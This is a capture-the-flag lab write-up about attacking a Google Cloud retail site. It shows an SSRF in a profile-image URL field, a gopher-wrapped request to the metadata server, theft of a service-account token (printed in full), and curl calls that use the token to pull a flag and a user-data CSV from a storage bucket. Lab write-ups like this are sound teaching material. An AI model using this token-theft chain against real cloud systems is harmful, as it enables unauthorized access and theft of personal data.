
The scenario of the lab is that You have recently joined a red team and are on an engagement for the client Gigantic Retail. In scope is their on-premise and cloud environments. As the cloud specialist, you are called upon to get initial access to their infrastructure, starting with an identified IP address.

Initial Entry point

Type Value
IP Address


With the IP Address, I’ve tried to access it directly and found that port 80 is open and hosts a kind of retail website 

But there is an interesting functionality where you can specify your profile from a remote URL which is an interesting place to start looking out for SSRF

Intercepting the request and looking into the source of the website 

In the above, as you can see when we pass the image URL to fetch the image.. it calls through url parameter and then looks into the source, where you can see inside <script> we have document.addEventListener('DOMContentLoaded', function() {...}) where it will wait until HTML content to be loaded and once it loaded it tells the profile-photo element where it sets it to url which we passed

But when u pass some reachable URL we may receive a pingback and even though it says “Not an Image”

In the Image URL replayed the value with the following URL which is the metadata for Google cloud just like in AWS which is and URL processed and discloses computeMetadata in the response

But results in 403 when we tried to hit the because we have to pass the header value which is Metadata-Flavor: Google

But even after passing the header Metadata-Flavor: Google we are still receiving the 403

Looking into the following blog here from Cody about abusing Google Cloud functions through gopher and got an idea of constructing the gopher payload but we need how the internal request looks like 

GET /computeMetadata/v1 HTTP/1.1
Accept: */*
Metadata-Flavor: Google

Converting this HTTP request into the gopher


When passing the payload through the url parameter we didn’t 403 instead our request was successfully parsed disclosing the execution and further paths inside cloud metadata 

Accessing /instance further reveals internal paths and we have to access service-accounts 

Accessing that service-accounts reveals that other than default we have other one service account which is 

Service accounts in Google Cloud Platform (GCP) are special types of accounts used to grant specific permissions to applications, virtual machines, and other services within GCP, enabling them to interact with other Google Cloud services

Adding to that /service-accounts/ will reveal the token of the specific account just like iam credentials in AWS via metadata 

Checked the token using the curl command and found that the token is valid and online 

lunat1c@DESKTOP-PPC1SO9:/mnt/c/Users/nithi$ curl -H "Content-Type: application/x-www-form-urlencoded" -d "access_token=ya29.c.c0AY_VpZgBbzy_M8iNeYS9J1McBJnQAPLsAUQ27C6g07VyUz3FPe_sIi5GJtPDpMHZcnSF8jVjuNyIpfpMvJ6b619ENrMbUXosdRvOqzpDqTAg2HmVJw14RvAmynCsx3MzQcsWq_hpKCVjlXZo7ymOop1CuHMbi7II2Gd7HxigAaHbqDCu5nlAJxYARFfri3g9avb3N4B4UFfiBMCbhQp6U1YG5-lOI-H0RsYxBSySHv5TelWXDQRC3giFz7H6yg50mV3A7Rw5f108qY89BL3je6vGoPxmBX63a-OO6Sj3UxmwidYZms9oVtjIXJOl_V95ktagGehAvNamq0ICOLmLrvWLLAqLbIcyD7OgurWcxrM3IWTIUgMrC8C7vXhzMJB2T393Kde48XIUag5loxhk3o1s8kMv8b5ZnV8j4fsYZF11RR7eixWetn4iJMYxQg0g3Z7ucBu7u_p2w49M0f07435yqpRet6y_raxBwZik_b_lpod3ZV1e7byo7XzmqYFYWcjUnort8Xp2sSI7_gnj_YVzdsQRYXQ663MylV3XYOdZ-mck6911SdSpvrwSoV9sY2I0fXWyaIYIZn6bjt2x4zn7kcYXBxaiBz6dJRuwik0f2yg1mWbXhc4da04xqY3Q-3hSX1eolcisuvFsyIZ-5ww80r0_IvR3oWdnhMkvslxoo1kwm61cRYcj1r0hOR91Iu8BnebUz8F9t1kRs6WxJxm0idI1B8J9kOmhF0y2Zs-B01993vatMBofkhcu7pp0r6dieb3VBXY3yS6bmSh4Syrjlp87xJ5o6dQ-iVJsUpb8B7S4ucnRdzyJWpbvhgxW9i1F15vwof6wIy5Srtqpcdr6agphwbRdQWeZuBQ1mp7xrtuV0jxtRu5daxBwZX9Z7QdfV5-Iq5fQB1kOo9dYFQSQ5yY818xtvySeRqunt2VXRlm2bwMs3-w9_WcO_RcSwXn01fleM7u2IS3pq-onh9Y3tM9XSFah6SeY48bOfo3fUyYSqk7rIm1"

 "issued_to": "113150342444479982060",
 "audience": "113150342444479982060",
 "scope": "",
 "expires_in": 2507,
 "access_type": "online"

Further, we know that the images for the shop website are being hosted here 

From Google docs here, we gotta know about an API call to access Google storage buckets 

curl -H "Authorization: Bearer $GOOGLE_TOKEN" ""

Got to know the information about the objects and received a huge chunk of data but these two look interesting interesting 

 "kind": "storage#object",
 "id": "gigantic-retail/userdata/flag.txt/1703771329072518",
 "selfLink": "",
 "mediaLink": "",
 "name": "userdata/flag.txt",
 "bucket": "gigantic-retail",
 "generation": "1703771329072518",
 "metageneration": "1",
 "contentType": "text/plain",
 "storageClass": "STANDARD",
 "size": "33",
 "md5Hash": "J+PDkjepBufLwKoiCflv2w==",
 "crc32c": "/H+7+Q==",
 "etag": "CIab5OaisoMDEAE=",
 "timeCreated": "2023-12-28T13:48:49.125Z",
 "updated": "2023-12-28T13:48:49.125Z",
 "timeStorageClassUpdated": "2023-12-28T13:48:49.125Z"
 "kind": "storage#object",
 "id": "gigantic-retail/userdata/user_data.csv/1703877006716190",
 "selfLink": "",
 "mediaLink": "",
 "name": "userdata/user_data.csv",
 "bucket": "gigantic-retail",
 "generation": "1703877006716190",
 "metageneration": "1",
 "contentType": "text/csv",
 "storageClass": "STANDARD",
 "size": "2388",
 "md5Hash": "JMvLqhSoe2s9FX6JlXGmxw==",
 "crc32c": "2XJ9cA==",
 "etag": "CJ7a572stYMDEAE=",
 "timeCreated": "2023-12-29T19:10:06.754Z",
 "updated": "2023-12-29T19:10:06.754Z",
 "timeStorageClassUpdated": "2023-12-29T19:10:06.754Z"

Accessing mediaLink with the same curl command with little correction will reveal the flag 

lunat1c@DESKTOP-PPC1SO9:/mnt/c/Users/nithi$ curl -H "Authorization: Bearer $GOOGLE_ACCESS_TOKEN" ""


You can ask what is the other interesting file which is user data disclosure where it highlights during ur pentest 

lunat1c@DESKTOP-PPC1SO9:/mnt/c/Users/nithi$ curl -H "Authorization: Bearer $GOOGLE_ACCESS_TOKEN" ""

Name,Address,PhoneNumber,Email,Job Title,Company
John Doe,123 Main St, Seattle, WA 98101,555-1234,,Software Engineer,Nova Software Solutions
Jane Smith,456 Oak Ave, Boston, MA 02110,555-5678,,Project Manager,Blue Bay Technologies
Bob Johnson,789 Pine Rd, Austin, TX 78701,555-9012,,Graphic Designer,Creative Edge Design
Alice Williams,101 Cedar Lane, Denver, CO 80202,555-3456,,HR Specialist,Peak Human Resources
Charlie Brown,202 Maple Blvd, Chicago, IL 60601,555-7890,,Marketing Director,Market Genius Inc.
Emily Davis,303 Elm Street, San Francisco, CA 94102,555-2345,,Financial Analyst,Zenith Finance
Michael Miller,404 Birch Lane, New York, NY 10001,555-6789,,IT Consultant,Tech Frontier
Olivia Wilson,505 Pinecrest Rd, Miami, FL 33101,555-0123,,Real Estate Agent,Sunshine Realty
David Taylor,606 Oakwood Ave, Philadelphia, PA 19106,555-4567,,Architect,Arco Partners
Sophia Anderson,707 Maple Court, Las Vegas, NV 89101,555-8901,,Sales Manager,Next Step Sales
Daniel Harris,808 Cedar Rd, Atlanta, GA 30301,555-2341,,Web Developer,Web World Development
Grace Thomas,909 Birch Blvd, Minneapolis, MN 55401,555-6785,,Clinical Researcher,Biogen Research Labs
Isaac Martinez,1010 Oak Lane, Portland, OR 97201,555-0129,,Teacher,EduWorld Schools
Ella Rodriguez,1111 Pine Ave, Dallas, TX 75201,555-4563,,Journalist,Media Vista
James Smith,1212 Cedar Street, Orlando, FL 32801,555-8907,,Attorney,Legal Pros LLP
Ava Johnson,1313 Elm Rd, Phoenix, AZ 85001,555-2349,,Interior Designer,Innovative Designs
Liam Davis,1414 Maple Lane, Raleigh, NC 27601,555-6783,,Chef,Gourmet Chef Culinary
Mia Wilson,1515 Pine Blvd, Cleveland, OH 44101,555-0127,,Pharmacist,Sigma Pharmacy
Noah Taylor,1616 Birch Ave, Nashville, TN 37201,555-4561,,Engineer,TrueTech Engineering
Sophie Brown,1717 Oakwood Rd, Kansas City, MO 64101,555-8905,,Fitness Trainer,FitNation